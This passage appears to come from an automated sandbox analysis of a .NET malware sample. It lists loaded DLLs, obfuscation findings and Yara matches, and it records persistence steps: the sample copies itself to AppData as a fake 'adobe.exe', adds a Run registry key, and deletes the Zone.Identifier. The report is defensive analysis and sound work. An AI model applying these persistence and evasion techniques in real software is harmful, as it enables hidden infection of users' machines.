                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                Source: x4l3iVpFSc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: x4l3iVpFSc.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: x4l3iVpFSc.exeStatic file information: File size 3137440 > 1048576
                Source: x4l3iVpFSc.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2a0400
                Source: x4l3iVpFSc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1477309607.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1470767093.0000000003D72000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003953000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.2005831500.0000000003FC3000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: x4l3iVpFSc.exe, 00000000.00000002.1470767093.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1477309607.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1470767093.0000000003D72000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003953000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.2005831500.0000000003FC3000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: x4l3iVpFSc.exe, ConnectedHandler.cs.Net Code: RemoveHandler System.AppDomain.Load(byte[])
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.x4l3iVpFSc.exe.5da0000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.x4l3iVpFSc.exe.39e5570.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.x4l3iVpFSc.exe.3ea6e40.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: Yara matchFile source: 0.2.x4l3iVpFSc.exe.5630000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.x4l3iVpFSc.exe.5630000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1982245399.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1476195329.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1460625473.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1893124137.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x4l3iVpFSc.exe PID: 6572, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7744, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7832, type: MEMORYSTR
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_03140789 push eax; ret 8_2_0314078A
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_031407D9 push eax; ret 8_2_031407DA
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_031407F0 push eax; ret 8_2_031407FA
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_031407E0 push eax; ret 8_2_031407EA
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_03140810 push eax; ret 8_2_0314081A
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_03140800 push eax; ret 8_2_0314080A
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE6D5B push es; retf 8_2_06FE6D5C
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeCode function: 8_2_06FE2B09 push es; iretd 8_2_06FE2B0C
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06272568 push es; iretd 10_2_06272584
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06275C98 push es; retn 0005h10_2_06275C9A
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06275D2F push es; retn 0005h10_2_06275D32
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06277D41 push ss; retn 0005h10_2_06277D42
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06276B28 push cs; retn 0005h10_2_06276B2A
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06271818 push es; retf 10_2_06271844
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_06279840 pushfd ; retn 0005h10_2_06279841
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 10_2_0627184E push es; iretd 10_2_06271874
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01140789 push eax; ret 13_2_0114078A
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_011407D9 push eax; ret 13_2_011407DA
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_011407F0 push eax; ret 13_2_011407FA
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_011407E0 push eax; ret 13_2_011407EA
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01140810 push eax; ret 13_2_0114081A
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_01140800 push eax; ret 13_2_0114080A
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067AA24B push es; ret 13_2_067AA24C
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067A273F push es; retf 13_2_067A2740
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067A27D5 push es; retf 13_2_067A27DC
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 13_2_067AA1E7 push es; ret 13_2_067AA1E8
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D0769 push eax; ret 14_2_014D076A
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D07D9 push eax; ret 14_2_014D07DA
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D07E0 push eax; ret 14_2_014D07EA
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D07F0 push eax; ret 14_2_014D07FA
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 14_2_014D0789 push eax; ret 14_2_014D078A
                Source: 0.2.x4l3iVpFSc.exe.4fd0000.6.raw.unpack, XdUhjJCbHrAMRbPVHZZ.csHigh entropy of concatenated method names: 'UdDCvMmUPu', 'f4YC1u6eGx', 'lVLC9JCYRM', 'gYvCGQR7us', 'GkqCR1bm7W', 'A2dCZjIqXL', 'Fr3CoYtxwF', 'wYjCSmsxEs', 'J5xCunJxcI', 'mXqCYoZYNQ'

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile written: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile created: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to dropped file
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
